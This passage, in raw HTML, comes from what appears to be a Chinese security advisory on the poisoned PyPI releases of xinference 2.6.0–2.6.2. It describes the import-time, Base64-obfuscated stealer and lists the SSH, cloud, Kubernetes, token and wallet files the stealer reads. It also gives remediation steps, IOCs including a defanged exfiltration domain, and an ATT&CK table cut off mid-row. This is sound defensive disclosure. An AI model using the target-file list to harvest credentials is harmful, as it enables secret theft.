rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041729" src="https://wechat2rss.xlab.app/img-proxy/?k=a235e2da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQ8lx6P5goRN4KJK41cGh8FJrghT4tAt9z30KSLMfYdCPlLsYNiaPuhh3Xp0nDjakql9VMhKLDH4F3hdjxY69FXJbS9LIIr9iads%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">投毒载体与进入方式</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次事件并非攻击者在Xinference官方源码仓库、提交历史或构建流水线中植入恶意代码，而是典型的&#34;合法PyPI发布线劫持&#34;。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意代码仅被注入在xinference/__init__.py中，这意味着只要用户执行import xinference、通过CLI启动服务，载荷就会自动执行。根据JFrog分析，第一阶段为高度混淆的Base64字节串，运行时解码并通过subprocess.Popen派生一个独立的后台Python解释器，将stdout/stderr全部压制；第一阶段再解码第二阶段采集器并通过标准输入喂给子进程，把采集结果写入临时文件、压缩为love.tar.gz后外传，随即清理临时痕迹。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041732" src="https://wechat2rss.xlab.app/img-proxy/?k=23c63202&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTgYercjtGeeib5f4npPQDBdKkcLbW0Kc4EP90l9ms31Z6Kwibn5kh1bP337goLo1jUZV1Nom9dqupXjfzv3kicJsSQ1ITFzwUYz8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">信息收集目标</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">潜在暴露对象包括：</span></p><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box; font-style: normal; font-weight: 400; text-align: justify; font-size: 16px; color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主机画像信息： hostname, pwd, whoami, uname -a, ip addr / ifconfig, ip route, printenv</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SSH密钥与主机密钥： ~/.ssh/id_rsa, /etc/ssh/ssh_host_*_key</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">云平台凭据： ~/.aws/credentials, ~/.aws/config, GCP配置, IMDSv2角色令牌, AWS Secrets Manager ListSecrets 与 SSM DescribeParameters枚举</span></p></li></ul></p></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">Kubernetes凭据： ~/.kube/config, /var/run/secrets/kubernetes.io/serviceaccount/token</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">容器与包管理凭据： ~/.docker/config.json, ~/.npmrc, ~/.pypirc, ~/.cargo/credentials.toml</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">Git与源码凭据： ~/.git-credentials, ~/.gitconfig</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">环境变量与机密文件： .env, .env.local, .env.production</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">基础设施配置： terraform.tfvars, terraform.tfstate, WireGuard, Helm</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">证书与TLS材料： .pem, .key, .p12, .pfx</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">加密货币钱包： 比特币、以太坊keystore、Solana validator keypair、Cardano、Monero等</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">Shell历史与系统账号信息： .bash_history, .zsh_history, /etc/passwd, /etc/shadow</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">应用类Webhook与API密钥： Slack/Discord Webhook, JSON/配置文件中的各类API Key</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这些凭据一旦外泄，可能被用于数据窃取、会话伪造、云资源接管、Kubernetes接管、包仓库二次投毒、源代码泄露、数据库外泄、资金类欺诈和加密货币盗取，甚至进一步实施真正的下游软件供应链投毒。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041731" src="https://wechat2rss.xlab.app/img-proxy/?k=6c27c0c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRLR5f3TkDb8h64gPJwpxjkNhpalKD1iaCpx3kpPGARbgawCU9ab6GOsNRwYjfxKIA3Jqsw1Uhme25fsRFSbFWcBXW0kd3dQCMI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">持久化与横向移动能力</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">由于AI推理环境通常持有跨云、跨项目的高权限凭据，样本外泄的数据具备天然的横向移动潜力：一份被窃的AWS IAM密钥可能直接打开云账号；一份被窃的K8s service account token可能直接接管集群；一份被窃的PyPI/npm/Cargo令牌则可能被攻击者用于对下游其它开源项目再次实施供应链投毒，形成链式放大。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041728" src="https://wechat2rss.xlab.app/img-proxy/?k=2b65c8ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQnQPFKgia84BPmTEh2ic7JtxHh3t67ibupVfFe4FqpGmWjLHvI6ABpibxZhHwnLzoJwVJxX2Wq9QJrh05DFBm63vIdUsW6rBSeDqE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">建议处置流程</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1. 识别影响主机：梳理所有安装或运行过xinference 2.6.0/2.6.1/2.6.2的主机、容器与CI环境。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2. 保全取证证据： 处置前先保留日志、pip缓存、site-packages目录与DNS/代理审计记录。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3. 按优先级轮换凭据： 立即轮换SSH密钥、云IAM凭据、K8s令牌、Docker/PyPI/npm/Cargo令牌、数据库密码与.env机密。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4. 核查下游访问日志：回溯云平台、代码托管与包仓库的访问记录，排查异常登录、令牌滥用与可疑外连。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5. 审计CI/CD与发布凭据： 清理xorbitsai/inference相关GitHub Actions权限、PYPI_PASSWORD等机密与不再使用的机器人账号。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6. 强化安全配置： 在PyPI、GitHub及维护者账号启用MFA，使用依赖锁定与SBOM工具持续扫描。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041730" src="https://wechat2rss.xlab.app/img-proxy/?k=c754d4fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSVmkId4WibNibxtwnJwoOC8GsAE3NdM3zZWt85iaibuicPG0l1JrvKaUOuLgib89YKiat8Wel03lgd5aQBEL6CyvicLicVL713eOjSZiaAk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">IOC</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">fe17e2ea4012d0</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">7d90ecb77</span><span leaf="">93c1b0593a6138d25a9393192263e751660ec3cd0</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">whereisitat.lucyatemysuperbox.space</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">hxxps://whe</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">reisita</span><span leaf="">t.lucyatemysuperbox.space/</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MITRE ATT&amp;CK:</span></p><table style="border-collapse:collapse;margin-left:4.6500pt;mso-table-layout-alt:fixed;border:none;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;min-width:657px;"><tbody><tr style="height:16.2500pt;"><td data-colwidth="110" width="141" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Tactic</span></b></p></td><td data-colwidth="154" width="255" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Technique</span></b></p></td><td data-colwidth="70" width="130" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">I</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">D</span></b></p></td><td data-colwidth="298" width="268" valign="center"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Application</span></b></p></td><td rowspan="13"></td></tr><tr style="height:42.8000pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Initial Access</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Supply Chain Compromise: Compromise Software Supply Chain</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1195.002</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">恶意代码通过合法</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">PyPI</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">发布线推送至</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">xinference 2.6.0/2.6.1/2.6.2</span></font></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Execution</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Command and Scripting Interpreter: Python</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1059.006</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">__init__.py</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">中双层</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Base64</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">载荷导入即执行</span></font></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="110" width="141" valign="top"><p><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Defense</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Evasion</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Obfuscated Files or Information</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1027</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">双层</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Base64</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">混淆 </span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">+ subprocess.Popen</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">分离 </span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">+ stdout/stderr</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">压制</span></font></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Defense Evasion</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Indicator Removal: File Deletion</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1070.004</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">采集完成后清理临时文件与</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">love.tar.gz</span></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Credential Access</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Unsecured Credentials: Credentials In Files</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1552.001</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">递归读取</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">.env</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">、</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">.aws/credentials</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">、</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">.kube/config</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">等凭据文件</span></font></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Credential Access</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Unsecured Credentials: Private Keys</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 